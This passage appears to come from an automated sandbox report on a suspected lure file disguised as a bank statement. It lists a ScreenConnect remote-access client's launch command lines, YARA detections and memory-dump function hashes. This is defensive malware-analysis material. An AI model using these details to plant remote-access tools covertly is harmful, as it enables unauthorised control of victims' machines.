                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "be299499-1fb7-4c2b-ae20-2cc88daa91a5" "User"
                                                                    Imagebase:0xeb0000
                                                                    File size:587'040 bytes
                                                                    MD5 hash:5DEC65C4047DE914C78816B8663E3602
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.2969214232.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 4%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:19:34:41
                                                                    Start date:21/11/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "8321ee3f-595b-4e66-bca9-df29533298fb" "System"
                                                                    Imagebase:0x2f0000
                                                                    File size:587'040 bytes
                                                                    MD5 hash:5DEC65C4047DE914C78816B8663E3602
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1808808896.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Reset < >
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                      • API String ID: 0-4202989938
                                                                      • Opcode ID: 67179eabae44de8b1456c1feb93f2b58a777b446b1609378eec585fb41aa1c39
                                                                      • Instruction ID: abbb7d71d04be094f29669cb4af267a154f30b6f7bb1b5fd8a18d08d68ebb887
                                                                      • Opcode Fuzzy Hash: 67179eabae44de8b1456c1feb93f2b58a777b446b1609378eec585fb41aa1c39
                                                                      • Instruction Fuzzy Hash: 96629270A006059FCB18EFA9C494ABEBBF2FF84310B648629D415DB795DB31EC46CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 45079cbd88ac85ed2790f51e2adee0e440d8f869367e612569fe6217b6a588df
                                                                      • Instruction ID: 93426bd4af32543674230a67e68cc83bbc4567a239d6fb9ef25402eeeb8da7e9
                                                                      • Opcode Fuzzy Hash: 45079cbd88ac85ed2790f51e2adee0e440d8f869367e612569fe6217b6a588df
                                                                      • Instruction Fuzzy Hash: DE325F347012148FCB15EF38C894A6DBBF2AF85214F1585E9D54ADB3A2DB36DD82CB41
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 10eb2e339ecb43445543a2c5baa5be03141952f841d002f9830082e3d097834c
                                                                      • Instruction ID: ca37c204ec471f6e51ecf6e786ff9d6879c7f80a5883ddf1acd153a023692b56
                                                                      • Opcode Fuzzy Hash: 10eb2e339ecb43445543a2c5baa5be03141952f841d002f9830082e3d097834c
                                                                      • Instruction Fuzzy Hash: D1C20D74A00604DFDB14DF68C884AADBBB2FF88310F158259E959AB7A5DB70EC41CF60
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a197fa86e17f7f6c1174ca4d6b9896ceb5427f636ee96d4bedd3887c79a9171c
                                                                      • Instruction ID: e8e5b4904f77f30fe1373b679871c529090e29d33d4532e6435e8c464dbf8408
                                                                      • Opcode Fuzzy Hash: a197fa86e17f7f6c1174ca4d6b9896ceb5427f636ee96d4bedd3887c79a9171c
                                                                      • Instruction Fuzzy Hash: 53427034A00219DFDB19DF64D958BADBBB6FF88300F1085A9E80AA7355DB31AD85CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 897d5bd9f8d32200da663f18a9642d36b0c2014bcda6c92aa8461baeb72f228f
                                                                      • Instruction ID: 4b3cb510e660fa98722e3838f11bfe19c99f2c447504578f3a28b88dc0c27387
                                                                      • Opcode Fuzzy Hash: 897d5bd9f8d32200da663f18a9642d36b0c2014bcda6c92aa8461baeb72f228f
                                                                      • Instruction Fuzzy Hash: 73328034A00219DFDB19DF64D958B6DBBB6FF88300F1485A9E80AA7355DB31AC85CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b8115c9aedb9d9c2e51f98e03a2835258e4a7d23d89960f31f6a24ad218deb3
                                                                      • Instruction ID: bb9ad3ea3dbf05267d35557e2893211a5d3615fdd3949a6a09cbdf43f25936b5
                                                                      • Opcode Fuzzy Hash: 5b8115c9aedb9d9c2e51f98e03a2835258e4a7d23d89960f31f6a24ad218deb3
                                                                      • Instruction Fuzzy Hash: 46124D74A002099FCB14DF68C984AAEBBF6FF88310F15C1A9E855AB351D735ED41CBA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                      • API String ID: 0-2464098231
                                                                      • Opcode ID: e9979dc4b7070341c1a57076725cbbc25ba701a0fd2d3a17c56a6321eb4f44d7
                                                                      • Instruction ID: 2b9cb266ce7da752c63754f58aea878bb04e403d64820b08723fd0539fb99f73
                                                                      • Opcode Fuzzy Hash: e9979dc4b7070341c1a57076725cbbc25ba701a0fd2d3a17c56a6321eb4f44d7
                                                                      • Instruction Fuzzy Hash: DD710331B002198FDB29AF65981467EBBB6FFC8720B20896AD5559F744DF319C02C7A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq$(bq$Hbq
                                                                      • API String ID: 0-2835675688
                                                                      • Opcode ID: db15a9222fd7b9c6510c78d4ddc1d90c1d33e08ec5e473516cc21dcfc78674f3
                                                                      • Instruction ID: fafd8db6b62533d9ec0a4dd8d40a0b7eae0bd236a9db70b01470b8385c53b1a0
                                                                      • Opcode Fuzzy Hash: db15a9222fd7b9c6510c78d4ddc1d90c1d33e08ec5e473516cc21dcfc78674f3
                                                                      • Instruction Fuzzy Hash: 37C1D331B042189FCB08EFA9C854ABEBBE6FF84350F258169E805DB355DA35DD42CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$~
                                                                      • API String ID: 0-1702678631
                                                                      • Opcode ID: cffe51326bec6d2d5d8884e2a6b83884e494cb1cd936fbada1610d8c7be690ec
                                                                      • Instruction ID: 8dd7527878b705fcf4dc5a1ce8cd649ae2f0959d02ccb8da82121d9a6ceb0b5a
                                                                      • Opcode Fuzzy Hash: cffe51326bec6d2d5d8884e2a6b83884e494cb1cd936fbada1610d8c7be690ec
                                                                      • Instruction Fuzzy Hash: 13518170B406049FCB54EB79C994B6EBBF2EF88610F645568E506DB7A0DB31AC02CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: kK$YCm^
                                                                      • API String ID: 0-2720642085
                                                                      • Opcode ID: d6677685855d73684e6cae44ee0f1b4cb75b5fa2e99f23d3a9d0f253392b06a8
                                                                      • Instruction ID: 3d74378efc764f7ddde67911ef0ae7d1911e66a40828690fdfb59bf6769c3745
                                                                      • Opcode Fuzzy Hash: d6677685855d73684e6cae44ee0f1b4cb75b5fa2e99f23d3a9d0f253392b06a8
                                                                      • Instruction Fuzzy Hash: D421F5302047469FC706AB78D99467EFFF2FF81210B18866AD465CB355DB749C48CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q$Te^q
                                                                      • API String ID: 0-3743469327
                                                                      • Opcode ID: 851bceb20f51ad6e6166f7c9754006defffb2369d4263e8c7ece0c0757c9f18c
                                                                      • Instruction ID: d5365f70d4eccdc4a502c6305a15e0898212f2ea7e4e4b462281e109dde9d5e8
                                                                      • Opcode Fuzzy Hash: 851bceb20f51ad6e6166f7c9754006defffb2369d4263e8c7ece0c0757c9f18c
                                                                      • Instruction Fuzzy Hash: 6C113635B002404FC745AB7C985C26E7FE6AFC6220B64806AE841CB3A2DD35CC05C7A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q$Te^q
                                                                      • API String ID: 0-3743469327
                                                                      • Opcode ID: 337f93e2620722874a6a79ddfa538e85a8364e1794d4d6158745a0b82e8b5c76
                                                                      • Instruction ID: 0c0be9d14342ca23c95d550d994b402a81f9e1bfa7de2c280c097f167913c8f4
                                                                      • Opcode Fuzzy Hash: 337f93e2620722874a6a79ddfa538e85a8364e1794d4d6158745a0b82e8b5c76
                                                                      • Instruction Fuzzy Hash: 4701D1353102104F8B48BB7D905C87EBAEBAFC9664324852EE906CB365CE35DD05C7E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 99a126d357621063066c1b8e155faedeb9cc63e673944f95857431f7cc19b236
                                                                      • Instruction ID: 099c496a3db040249396ed74d9a134acefaf5a5a91ad2ecb233263fb338d2e90
                                                                      • Opcode Fuzzy Hash: 99a126d357621063066c1b8e155faedeb9cc63e673944f95857431f7cc19b236
                                                                      • Instruction Fuzzy Hash: 1FD13B34600215CFCB04DF58C988D7ABBF6FF88314B968499E8569B2A6DB30FD45CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: bcc2c77f61cf91d317c9ccb0cd52b97083e6decf0e2bd8b0ed937a133c816ffb
                                                                      • Instruction ID: d5b105532f4d5bd631501a189c9b7776bf932a3199acde18d813c2df0f0f8d36
                                                                      • Opcode Fuzzy Hash: bcc2c77f61cf91d317c9ccb0cd52b97083e6decf0e2bd8b0ed937a133c816ffb
                                                                      • Instruction Fuzzy Hash: 29510470B002059FDB28AB64D858B7EB7F2BF85714F14862AE46ADB391DF309C42C781
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-2599400749
                                                                      • Opcode ID: d1489f6f9059de946c9c641beaa7c7f0b832f4ae03b3d4c94d222d4c9b2866ae
                                                                      • Instruction ID: ddde70ab394bb848920172f41725f65a78fca67a6f4231a5f5675cd8c1daa500
                                                                      • Opcode Fuzzy Hash: d1489f6f9059de946c9c641beaa7c7f0b832f4ae03b3d4c94d222d4c9b2866ae
                                                                      • Instruction Fuzzy Hash: 47616D74B002098FCB14EFB9C98496ABBF6FF88314B158669E515DB325EB30EC45CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-2599400749
                                                                      • Opcode ID: 30137ef0bdf91851e157900498f09138516061b3e1dd7b38fad2e24b0f4343cc
                                                                      • Instruction ID: 970ea589d874110404655d9ba236cfe97f819c74de888392dc49e623546dff3f
                                                                      • Opcode Fuzzy Hash: 30137ef0bdf91851e157900498f09138516061b3e1dd7b38fad2e24b0f4343cc
                                                                      • Instruction Fuzzy Hash: 5B514E34B002098FCB54EFA9C58496ABBF6FF8C314B148569E515DB325EB70EC45CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K+
                                                                      • API String ID: 0-1526790930
                                                                      • Opcode ID: 08d21352022ee43d4b35f80bd7927fbeb387a7a8152afd828cf365b7e2a07593
                                                                      • Instruction ID: 5300f91dab5774c8eaee061557dd9ed4d5865ae70f9d826fb540f7133f63d1d8
                                                                      • Opcode Fuzzy Hash: 08d21352022ee43d4b35f80bd7927fbeb387a7a8152afd828cf365b7e2a07593
                                                                      • Instruction Fuzzy Hash: 3A41A231A102059FCF15EFA8D8949BEFBB1FF84310F148229E805AB341DB709946CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K
                                                                      • API String ID: 0-2299363055
                                                                      • Opcode ID: 89c9c28677c05fe085a7afb66536f81b8f8bd7f0614d481a9ee7de9a51d8e9dd
                                                                      • Instruction ID: ed76703402925851fe807ad5528d4d5e11e7c3bd7dfacd604888a2dd3dce7478
                                                                      • Opcode Fuzzy Hash: 89c9c28677c05fe085a7afb66536f81b8f8bd7f0614d481a9ee7de9a51d8e9dd
                                                                      • Instruction Fuzzy Hash: 6131F6322047A04FD701EF7CD8A56EA7FA1EF82228F0444B6D4948F266DA71D84FC795
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: dbeb6c198f0860345e872999f0456107e3af4e989b654437676c223c08bc44d4
                                                                      • Instruction ID: 5079195c99903796b0290df0b6123e75d7a5a863ad39f15850a1957c0204c694
                                                                      • Opcode Fuzzy Hash: dbeb6c198f0860345e872999f0456107e3af4e989b654437676c223c08bc44d4
                                                                      • Instruction Fuzzy Hash: C3415D71B1020A9FCB08EF68D99496EBBF2FF88305B508669D405DB365DB30ED05CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Cm^
                                                                      • API String ID: 0-84106230
                                                                      • Opcode ID: c686e4025af9960fc3711d8cf3bcfc26ab0cd9a745cb1c562426a557a339b71e
                                                                      • Instruction ID: 300ec042b63e8d8f7d3203c2ac2abead4eb907953ca8a7ed98464b5b5eac690e
                                                                      • Opcode Fuzzy Hash: c686e4025af9960fc3711d8cf3bcfc26ab0cd9a745cb1c562426a557a339b71e
                                                                      • Instruction Fuzzy Hash: 03312B9655E7E00FE7027B7CA9713D93F60CF57265F0901A3C4C4CB2A7E454888AC3A6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hbq
                                                                      • API String ID: 0-1245868
                                                                      • Opcode ID: 830020d6eec5dddd3d1f88e1a6b11a1b43a2a3148942c11e13bc14478b2bef1d
                                                                      • Instruction ID: 98aa315d43a8c6bc21b846c24feb08f3316e241a6b075fe8af538fb32826d6b5
                                                                      • Opcode Fuzzy Hash: 830020d6eec5dddd3d1f88e1a6b11a1b43a2a3148942c11e13bc14478b2bef1d
                                                                      • Instruction Fuzzy Hash: D0319335E106498FCB05EFB8C8448EEBFB5FF8A210B01866AE505AB221FF30D545CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 398e15f5324b917ca30b94adaad340cb83040b8ef1dbe1effd9c1a8364c8749a
                                                                      • Instruction ID: e4015fde39b60d67cbabd141fd6247d056d2d99e286cfdd3bec33e7fad79ca1e
                                                                      • Opcode Fuzzy Hash: 398e15f5324b917ca30b94adaad340cb83040b8ef1dbe1effd9c1a8364c8749a
                                                                      • Instruction Fuzzy Hash: E6318735B11209AFDB19AF60E85DBBEBBB2FF84750F148669F006AB291DF705845CB40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 5691e9bc38fcd2da6bb7f59f2453c33a89a1afa65711ee9bd9df4c2190a53e35
                                                                      • Instruction ID: e1bb1fdb73a2a7b9511813cec8b8a70eb1cc411046a38981f7a4e7a29e92e6cc
                                                                      • Opcode Fuzzy Hash: 5691e9bc38fcd2da6bb7f59f2453c33a89a1afa65711ee9bd9df4c2190a53e35
                                                                      • Instruction Fuzzy Hash: 25216F30A01309DFDB69DAA6D85CBAE76B7ABC8704F604429E812E7284DE709D05CB45
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: dab4dba51ade6847328293013b0672b4a595ca0cc661c89717c8ab031381dfa6
                                                                      • Instruction ID: 731074350b57b67e6a6373ede6ada5a925f80a3043598ea4d8dd96249cfc14eb
                                                                      • Opcode Fuzzy Hash: dab4dba51ade6847328293013b0672b4a595ca0cc661c89717c8ab031381dfa6
                                                                      • Instruction Fuzzy Hash: 7F215030B11209DFDB58DB62D85CBBE76B7ABC8600F208129E816A7384DF749D41CB85
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 6902b2c6b2ba3573bcc5aa7105c7aaf5135a5098632161372182c29961c1480f
                                                                      • Instruction ID: 5b111983f6e0230bc6bc5012b79ff5ab82b2343d7d7bca9e4e6bdcb31b92fff7
                                                                      • Opcode Fuzzy Hash: 6902b2c6b2ba3573bcc5aa7105c7aaf5135a5098632161372182c29961c1480f
                                                                      • Instruction Fuzzy Hash: 5421A171210B055FC719EB78D9486AEBBE5FF94314F004A2CD05ACB795EF71B8498B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q
                                                                      • API String ID: 0-1614139903
                                                                      • Opcode ID: 4562f92ff0434ba1f0f102a2756b914d755ef93cb6da77d2bb94142bdd5f790e
                                                                      • Instruction ID: 1230600328505c1fa0d9bd750c3da3ef690aadc2801989fa6f3a2d8054e369bf
                                                                      • Opcode Fuzzy Hash: 4562f92ff0434ba1f0f102a2756b914d755ef93cb6da77d2bb94142bdd5f790e
                                                                      • Instruction Fuzzy Hash: 94219030210B095FC718EB69D944A6EFBE5FB94314F404A2CD05ACB794EF71B8498B90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq
                                                                      • API String ID: 0-149360118
                                                                      • Opcode ID: f580e445c6b8ca130a45db3eb0c075d2c8f6fdf09a1d6d24309a4c0b36348d42
                                                                      • Instruction ID: c775a5bbdd11bedf844bb7190c436c679eb1310f9c9ef92354493c35fa7a2248
                                                                      • Opcode Fuzzy Hash: f580e445c6b8ca130a45db3eb0c075d2c8f6fdf09a1d6d24309a4c0b36348d42
                                                                      • Instruction Fuzzy Hash: E31123307083484FC319ABAD682056FBBFBFFC5260315822EE10AC3780CE345C0183A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K
                                                                      • API String ID: 0-2299363055
                                                                      • Opcode ID: 6252187114073611e807de35290b6febc731162307aba0d27371e3705633d2e5
                                                                      • Instruction ID: b7811934f911c99bdb28473000baba4af4f21bfad212fc9842d98e744015a9b4
                                                                      • Opcode Fuzzy Hash: 6252187114073611e807de35290b6febc731162307aba0d27371e3705633d2e5
                                                                      • Instruction Fuzzy Hash: 34114C713107099FC714EBA8D8849AABBE6EB84224B408A29E5199B315DB70EC48CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728124275.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;L
                                                                      • API String ID: 0-2817095199
                                                                      • Opcode ID: e676a4c1f11ab8676e03f8fd9f5a7f78e97895f9914a922576b51a0b060650a2
                                                                      • Instruction ID: ff59e835c1664c1233dd07674efe44625fc822a6cba9d0f528011569e0d283fb
                                                                      • Opcode Fuzzy Hash: e676a4c1f11ab8676e03f8fd9f5a7f78e97895f9914a922576b51a0b060650a2
                                                                      • Instruction Fuzzy Hash: 8E01F9B0B053811FC762676D6CA4875BF72FFD620035582A7E085CB712EA648C4AC7A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5800000_2024-11 eStmt 5563019.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 2541cae3bcfef245420ab97785d5c1f1d5b6107de38799987d5a1caede28faaa
                                                                      • Instruction ID: 59898bb43810649aedc5729190d947f2c3975a61b168405aeb563e61205ffa28
                                                                      • Opcode Fuzzy Hash: 2541cae3bcfef245420ab97785d5c1f1d5b6107de38799987d5a1caede28faaa
                                                                      • Instruction Fuzzy Hash: 88117930A402198FCB58DB68C818AAEB7F2BF88714F500469E402EB3A0DF759C05CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1728761918.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
